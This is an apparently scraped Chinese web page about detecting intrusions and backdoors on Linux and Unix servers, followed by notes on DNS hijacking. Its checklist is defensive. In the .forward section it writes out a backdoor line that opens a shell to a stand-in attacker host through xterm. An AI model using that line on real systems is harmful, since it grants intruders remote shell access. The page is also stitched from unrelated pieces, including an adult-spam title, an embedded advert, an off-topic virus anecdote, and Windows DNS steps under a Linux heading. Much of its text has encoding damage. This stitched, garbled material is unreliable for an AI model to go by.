免费观看又色又爽又黄的小说免费_美女福利视频国产片_亚洲欧美精品_美国一级大黄大色毛片

linux系統(tǒng)命令被劫持,shell劫持

Linux服務(wù)器是否被攻擊怎么判斷

1、檢查系統(tǒng)密碼文件

成都創(chuàng)新互聯(lián)公司長(zhǎng)期為千余家客戶提供的網(wǎng)站建設(shè)服務(wù),團(tuán)隊(duì)從業(yè)經(jīng)驗(yàn)10年,關(guān)注不同地域、不同群體,并針對(duì)不同對(duì)象提供差異化的產(chǎn)品和服務(wù);打造開放共贏平臺(tái),與合作伙伴共同營(yíng)造健康的互聯(lián)網(wǎng)生態(tài)環(huán)境。為安慶企業(yè)提供專業(yè)的成都網(wǎng)站制作、網(wǎng)站設(shè)計(jì)、外貿(mào)網(wǎng)站建設(shè)安慶網(wǎng)站改版等技術(shù)服務(wù)。擁有十載豐富建站經(jīng)驗(yàn)和眾多成功案例,為您定制開發(fā)。

首先從明顯的入手,查看一下passwd文件,ls –l /etc/passwd查看文件修改的日期。

檢查一下passwd文件中有哪些特權(quán)用戶,系統(tǒng)中uid為0的用戶都會(huì)被顯示出來(lái)。

1

awk –F:’$3==0?{print?$1}’?/etc/passwd

順便再檢查一下系統(tǒng)里有沒有空口令帳戶:

1

awk –F: ‘length($2)==0?{print?$1}’?/etc/shadow

2、查看一下進(jìn)程,看看有沒有奇怪的進(jìn)程

重點(diǎn)查看進(jìn)程:ps –aef | grep inetd

inetd是UNIX系統(tǒng)的守護(hù)進(jìn)程,正常的inetd的pid都比較靠前,如果你看到輸出了一個(gè)類似inetd –s /tmp/.xxx之類的進(jìn)程,著重看inetd –s后面的內(nèi)容。在正常情況下,LINUX系統(tǒng)中的inetd服務(wù)后面是沒有-s參數(shù)的,當(dāng)然也沒有用inetd去啟動(dòng)某個(gè)文件;而solaris系統(tǒng)中也僅僅是inetd –s,同樣沒有用inetd去啟動(dòng)某個(gè)特定的文件;如果你使用ps命令看到inetd啟動(dòng)了某個(gè)文件,而你自己又沒有用inetd啟動(dòng)這個(gè)文件,那就說(shuō)明已經(jīng)有人入侵了你的系統(tǒng),并且以root權(quán)限起了一個(gè)簡(jiǎn)單的后門。

輸入ps –aef 查看輸出信息,尤其注意有沒有以./xxx開頭的進(jìn)程。一旦發(fā)現(xiàn)異樣的進(jìn)程,經(jīng)檢查為入侵者留下的后門程序,立即運(yùn)行kill –9 pid 開殺死該進(jìn)程,然后再運(yùn)行ps –aef查看該進(jìn)程是否被殺死;一旦此類進(jìn)程出現(xiàn)殺死以后又重新啟動(dòng)的現(xiàn)象,則證明系統(tǒng)被人放置了自動(dòng)啟動(dòng)程序的腳本。這個(gè)時(shí)候要進(jìn)行仔細(xì)查找:find / -name 程序名 –print,假設(shè)系統(tǒng)真的被入侵者放置了后門,根據(jù)找到的程序所在的目錄,會(huì)找到很多有趣的東東J

UNIX下隱藏進(jìn)程有的時(shí)候通過替換ps文件來(lái)做,檢測(cè)這種方法涉及到檢查文件完整性,稍后我們?cè)儆懻撨@種方法。

接下來(lái)根據(jù)找到入侵者在服務(wù)器上的文件目錄,一步一步進(jìn)行追蹤。

3、檢查系統(tǒng)守護(hù)進(jìn)程

檢查/etc/inetd.conf文件,輸入:cat /etc/inetd.conf | grep –v “^#”,輸出的信息就是你這臺(tái)機(jī)器所開啟的遠(yuǎn)程服務(wù)。

一般入侵者可以通過直接替換in.xxx程序來(lái)創(chuàng)建一個(gè)后門,比如用/bin/sh 替換掉in.telnetd,然后重新啟動(dòng)inetd服務(wù),那么telnet到服務(wù)器上的所有用戶將不用輸入用戶名和密碼而直接獲得一個(gè)rootshell。

4、檢查網(wǎng)絡(luò)連接和監(jiān)聽端口

輸入netstat -an,列出本機(jī)所有的連接和監(jiān)聽的端口,查看有沒有非法連接。

輸入netstat –rn,查看本機(jī)的路由、網(wǎng)關(guān)設(shè)置是否正確。

輸入 ifconfig –a,查看網(wǎng)卡設(shè)置。

5、檢查系統(tǒng)日志

命令last | more查看在正常情況下登錄到本機(jī)的所有用戶的歷史記錄。但last命令依賴于syslog進(jìn)程,這已經(jīng)成為入侵者攻擊的重要目標(biāo)。入侵者通常會(huì)停止系統(tǒng)的syslog,查看系統(tǒng)syslog進(jìn)程的情況,判斷syslog上次啟動(dòng)的時(shí)間是否正常,因?yàn)閟yslog是以root身份執(zhí)行的,如果發(fā)現(xiàn)syslog被非法動(dòng)過,那說(shuō)明有重大的入侵事件。

在linux下輸入ls –al /var/log

在solaris下輸入 ls –al /var/adm

檢查wtmp utmp,包括messgae等文件的完整性和修改時(shí)間是否正常,這也是手工擦除入侵痕跡的一種方法。

6、檢查系統(tǒng)中的core文件

通過發(fā)送畸形請(qǐng)求來(lái)攻擊服務(wù)器的某一服務(wù)來(lái)入侵系統(tǒng)是一種常規(guī)的入侵方法,典型的RPC攻擊就是通過這種方式。這種方式有一定的成功率,也就是說(shuō)它并不能100%保證成功入侵系統(tǒng),而且通常會(huì)在服務(wù)器相應(yīng)目錄下產(chǎn)生core文件,全局查找系統(tǒng)中的core文件,輸入find / -name core –exec ls –l {} \; 依據(jù)core所在的目錄、查詢core文件來(lái)判斷是否有入侵行為。

7、.rhosts和.forward

這是兩種比較著名的后門文件,如果想檢查你的系統(tǒng)是否被入侵者安裝了后門,不妨全局查找這兩個(gè)文件:

find / -name “.rhosts” –print

find / -name “.forward” –print

在某用戶的$HOME下,.rhosts文件中僅包含兩個(gè)+號(hào)是非常危險(xiǎn)的,如果你的系統(tǒng)上開了513端口(rlogin端口,和telnet作用相同),那么任意是誰(shuí)都可以用這個(gè)用戶登錄到你的系統(tǒng)上而不需要任何驗(yàn)證。

看到這里如果想要深入的做安全加固服務(wù)以及安全部署

就必須找專業(yè)做服務(wù)器的安全公司來(lái)處理了國(guó)內(nèi)也就Sine安全和綠盟比較專業(yè)提供。

Unix下在.forward文件里放入命令是重新獲得訪問的常用方法在某一 用戶$HOME下的.forward可能設(shè)置如下:

\username|"/usr/local/X11/bin/xterm -disp hacksys.other.dom:0.0 –e /bin/sh"

這種方法的變形包括改變系統(tǒng)的mail的別名文件(通常位于/etc/aliases). 注意這只是一種簡(jiǎn)單的變換. 更為高級(jí)的能夠從.forward中運(yùn)行簡(jiǎn)單腳本實(shí)現(xiàn)在標(biāo)準(zhǔn)輸入執(zhí)行任意命令(小部分預(yù)處理后).利用smrsh可以有效的制止這種后門(雖然如果允許可以自運(yùn)行的elm's filter或procmail類程序, 很有可能還有問題。在Solaris系統(tǒng)下,如果你運(yùn)行如下命令:

ln -s /var/mail/luser ~/.forward

然后設(shè)置vacation有效,那么/var/mail/luser就會(huì)被拷貝到~/.forward,同時(shí)會(huì)附加"|/usr/bin/vacation me",舊的symlink被移到~/.forward..BACKUP中。

直接刪除掉這兩個(gè)文件也可以。

8、檢查系統(tǒng)文件完整性

檢查文件的完整性有多種方法,通常我們通過輸入ls –l 文件名來(lái)查詢和比較文件,這種方法雖然簡(jiǎn)單,但還是有一定的實(shí)用性。但是如果ls文件都已經(jīng)被替換了就比較麻煩。在LINUX下可以用rpm –V `rpm –qf 文件名` 來(lái)查詢,國(guó)家查詢的結(jié)果是否正常來(lái)判斷文件是否完整。在LINUX下使用rpm來(lái)檢查文件的完整性的方法也很多,這里不一一贅述,可以man rpm來(lái)獲得更多的格式。

UNIX系統(tǒng)中,/bin/login是被入侵者經(jīng)常替換作為后門的文件,接下來(lái)談一下login后門 :

UNIX里,Login程序通常用來(lái)對(duì)telnet來(lái)的用戶進(jìn)行口令驗(yàn)證。入侵者獲取login的源代碼并修改,使它在比較輸入口令與存儲(chǔ)口令時(shí)先檢查后門口令。如果用戶敲入后門口令,它將忽視管理員設(shè)置的口令讓你長(zhǎng)驅(qū)直入:這將允許入侵者進(jìn)入任何賬號(hào),甚至是root目錄。由于后門口令是在用戶真實(shí)登錄并被日志記錄到utmp和wtmP前產(chǎn)生的一個(gè)訪問,所以入侵者可以登錄獲取shell卻不會(huì)暴露該賬號(hào)。管理員注意到這種后門后,使用”strings”命令搜索login程序以尋找文本信息。許多情況下后門口令會(huì)原形畢露。入侵者又會(huì)開始加密或者更改隱藏口令,使strings命令失效。所以許多管理員利用MD5校驗(yàn)和檢測(cè)這種后門。UNIX系統(tǒng)中有md5sum命令,輸入md5sum 文件名檢查該文件的md5簽名。它的使用格式如下:md5sum –b 使用二進(jìn)制方式閱讀文件;md5sum –c 逆向檢查MD5簽名;md5sum –t 使用文本方式閱讀文件。

在前面提到過守護(hù)進(jìn)程,對(duì)于守護(hù)進(jìn)程配置文件inetd.conf中沒有被注釋掉的行要進(jìn)行仔細(xì)比較,舉個(gè)簡(jiǎn)單的例子,如果你開放了telnet服務(wù),守護(hù)進(jìn)程配置文件中就會(huì)有一句:telnet stream tcp nowait root /usr/sbin/in.telnetd in.telnetd

可以看到它所使用的文件是 /usr/sbin/in.telnetd,檢查該文件的完整性,入侵者往往通過替換守護(hù)進(jìn)程中允許的服務(wù)文件來(lái)為自己創(chuàng)建一個(gè)后門。

LINUX系統(tǒng)中的/etc/crontab也是經(jīng)常被入侵者利用的一個(gè)文件,檢查該文件的完整性,可以直接cat /etc/crontab,仔細(xì)閱讀該文件有沒有被入侵者利用來(lái)做其他的事情。

不替換login等文件而直接使用進(jìn)程來(lái)啟動(dòng)后門的方法有一個(gè)缺陷,即系統(tǒng)一旦重新啟動(dòng),這個(gè)進(jìn)程就被殺死了,所以得讓這個(gè)后門在系統(tǒng)啟動(dòng)的時(shí)候也啟動(dòng)起來(lái)。通常通過檢查/etc/rc.d下的文件來(lái)查看系統(tǒng)啟動(dòng)的時(shí)候是不是帶有后門程序;這個(gè)方法怎么有點(diǎn)象查windows下的trojan?

說(shuō)到這里,另外提一下,如果在某一目錄下發(fā)現(xiàn)有屬性為這樣的文件:-rwsr-xr-x 1 root root xxx .sh,這個(gè)表明任何用戶進(jìn)來(lái)以后運(yùn)行這個(gè)文件都可以獲得一個(gè)rootshell,這就是setuid文件。運(yùn)行 find –perm 4000 –print對(duì)此類文件進(jìn)行全局查找,然后刪除這樣的文件。

9、檢查內(nèi)核級(jí)后門

如果你的系統(tǒng)被人安裝了這種后門,通常都是比較討厭的,我常常就在想,遇到這種情況還是重新安裝系統(tǒng)算了J,言歸正傳,首先,檢查系統(tǒng)加載的模塊,在LINUX系統(tǒng)下使用lsmod命令,在solaris系統(tǒng)下使用modinfo命令來(lái)查看。這里需要說(shuō)明的是,一般默認(rèn)安裝的LINUX加載的模塊都比較少,通常就是網(wǎng)卡的驅(qū)動(dòng);而solaris下就很多,沒別的辦法,只有一條一條地去分析。對(duì)內(nèi)核進(jìn)行加固后,應(yīng)禁止插入或刪除模塊,從而保護(hù)系統(tǒng)的安全,否則入侵者將有可能再次對(duì)系統(tǒng)調(diào)用進(jìn)行替換。我們可以通過替換create_module()和delete_module()來(lái)達(dá)到上述目的。另外,對(duì)這個(gè)內(nèi)核進(jìn)行加固模塊時(shí)應(yīng)盡早進(jìn)行,以防系統(tǒng)調(diào)用已經(jīng)被入侵者替換。如果系統(tǒng)被加載了后門模塊,但是在模塊列表/proc/module里又看不到它們,有可能是使用了hack工具來(lái)移除加載的模塊,大名鼎鼎的knark工具包就有移除加載模塊的工具。出現(xiàn)這種情況,需要仔細(xì)查找/proc目錄,根據(jù)查找到的文件和經(jīng)驗(yàn)來(lái)判斷被隱藏和偽裝的進(jìn)程。Knark后門模塊就在/proc/knark目錄,當(dāng)然可能這個(gè)目錄是隱藏的。

linux 2.6 劫持系統(tǒng)調(diào)用 需要改哪些文件?

毒就是 AV終結(jié)者 變異 ,即使整個(gè)硬盤格式也不一定能完全清除,還有就是 最容易中的還有老病毒熊貓燒香.還有非常厲害的有 網(wǎng)吧破壞神ARP 現(xiàn)在已經(jīng)出來(lái)了ARP變種.很是郁悶.木馬的話始終是特洛伊家族的厲害.. 這是本人的親身經(jīng)歷.在一家網(wǎng)絡(luò)公司做技術(shù)員的經(jīng)歷!

解決方法:AV變異網(wǎng)上有些專殺會(huì)有點(diǎn)用.效果不大,.最徹底的方法還是重新分區(qū)做系統(tǒng),這也是不得以的方法,熊貓威金 什么的現(xiàn)在能殺。 不過中這種毒的幾率依然非常大。希望及時(shí)更新殺毒軟件 并及時(shí)實(shí)施監(jiān)控,ARP的中了的話 先恢復(fù)原廠設(shè)置再重新設(shè)置.然后死綁網(wǎng)卡的IP和MAC地址. 在路由器綁好點(diǎn).. 最好還用DOS命令綁一遍.做批處理每次開機(jī)自動(dòng)運(yùn)行。.. 總體 的來(lái)說(shuō)還是建議:希望及時(shí)更新殺毒軟件 并及時(shí)實(shí)施監(jiān)控

Linux_175_DNS劫持

正常的訪問網(wǎng)站的流程

用戶通過瀏覽器訪問 -- 訪問公網(wǎng)的 DNS 服務(wù)器,查詢 對(duì)應(yīng)的IP地址

DNS服務(wù)器正確的返回給用戶百度的ip地址,這樣用戶可以正常的看到百度的頁(yè)面

DNS劫持

你的機(jī)器被惡意篡改了DNS服務(wù)器的地址,比如123.206.16.61,在該黑客的DNS服務(wù)器上,寫了一個(gè)惡意的域名解析關(guān)系 123.206.16.66

當(dāng)用戶使用自己的機(jī)器訪問 -- 錯(cuò)誤的 DNS 配置,返回錯(cuò)誤的頁(yè)面內(nèi)容 -- 惡意的DNS服務(wù)器,返回了錯(cuò)誤的 IP 地址,造成用戶看到惡意的網(wǎng)站內(nèi)容

怎么判斷 linux dns劫持

在您遇到這一問題的時(shí)候,能夠正常解析域名嗎?另外,您提到這一問題有一定的隨機(jī)性,請(qǐng)多測(cè)試幾個(gè)域名(包括內(nèi)部的和公共的),觀察問題在什么情況下最容易出現(xiàn)。

也請(qǐng)檢查以下設(shè)置:

1. 右鍵點(diǎn)擊我的電腦,點(diǎn)擊屬性

2. 點(diǎn)擊計(jì)算機(jī)名

3. 點(diǎn)擊其他

4. 檢查“此計(jì)算機(jī)的主DNS后綴”設(shè)置,默認(rèn)情況下這一設(shè)置應(yīng)該是您的域名(比如Microsoft.com)

5. 打開網(wǎng)絡(luò)鏈接

6. 右鍵點(diǎn)擊網(wǎng)絡(luò)鏈接并點(diǎn)擊屬性

7. 雙擊TCP/IP

8. 點(diǎn)擊高級(jí),并點(diǎn)擊DNS屬性頁(yè)

9. 檢查“附加主要的連接特定的DNS后綴”選項(xiàng),默認(rèn)“附加主DNS后綴的父后綴”是被選中的

10.檢查此連接的DNS后綴內(nèi)是否設(shè)置了內(nèi)容,默認(rèn)為空。

判斷的方法

1.開始-運(yùn)行-cmd-輸入nslookup,之后可以看見DNS服務(wù)器地址

2.輸入站點(diǎn)名稱,如果能夠解析的話,能看到其IP地址,如果被劫持則出現(xiàn)dns request time out....信息...

修復(fù):

由于DNS被強(qiáng)制修改,kaspersky不能訪問,可以嘗試其它廠商的在線殺毒。

另:有的時(shí)候可以在瀏覽器中直接輸入IP地址,而不是域名。請(qǐng)嘗試!

網(wǎng)頁(yè)標(biāo)題:linux系統(tǒng)命令被劫持,shell劫持
本文地址:http://m.newbst.com/article32/hsejsc.html

成都網(wǎng)站建設(shè)公司_創(chuàng)新互聯(lián),為您提供響應(yīng)式網(wǎng)站服務(wù)器托管云服務(wù)器網(wǎng)站改版品牌網(wǎng)站制作網(wǎng)站導(dǎo)航

廣告

聲明:本網(wǎng)站發(fā)布的內(nèi)容(圖片、視頻和文字)以用戶投稿、用戶轉(zhuǎn)載內(nèi)容為主,如果涉及侵權(quán)請(qǐng)盡快告知,我們將會(huì)在第一時(shí)間刪除。文章觀點(diǎn)不代表本網(wǎng)站立場(chǎng),如需處理請(qǐng)聯(lián)系客服。電話:028-86922220;郵箱:631063699@qq.com。內(nèi)容未經(jīng)允許不得轉(zhuǎn)載,或轉(zhuǎn)載時(shí)需注明來(lái)源: 創(chuàng)新互聯(lián)

營(yíng)銷型網(wǎng)站建設(shè)